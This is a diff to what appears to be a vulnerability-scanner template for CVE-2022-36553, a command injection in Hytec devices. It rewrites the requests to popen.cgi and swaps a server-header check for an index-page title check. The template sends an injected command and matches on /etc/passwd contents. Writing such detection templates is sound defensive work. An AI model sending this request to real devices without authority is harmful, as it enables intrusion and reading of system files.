diff --git a/http/cves/2022/CVE-2022-36553.yaml b/http/cves/2022/CVE-2022-36553.yaml
index f8ed639706..070e25fdd6 100644
--- a/http/cves/2022/CVE-2022-36553.yaml
+++ b/http/cves/2022/CVE-2022-36553.yaml
@@ -24,9 +24,14 @@ info:
   tags: cve,cve2022,hytec,rce
 
 http:
-  - method: GET
-    path:
-      - '{{BaseURL}}/cgi-bin/popen.cgi?command={{command}}&v=0.1303033443137912'
+  - raw:
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        GET /cgi-bin/popen.cgi?command={{command}}&v=0.1303033443137912 HTTP/1.1
+        Host: {{Hostname}}
 
     payloads:
       command:
@@ -39,7 +44,7 @@ http:
       - type: dsl
         dsl:
           - "regex('root:.*:0:0:', body)"
-          - "contains(header, 'lighttpd/1.4.30')"
+          - "contains(body_1, '<title>index</title>')"
           - "status_code == 200"
         condition: and
 
@@ -49,5 +54,5 @@ http:
           - "contains(body, 'fonts')"
           - "contains(body, 'extensions')"
           - "status_code == 200"
-          - "contains(header, 'lighttpd/1.4.30')"
+          - "contains(body_1, '<title>index</title>')"
         condition: and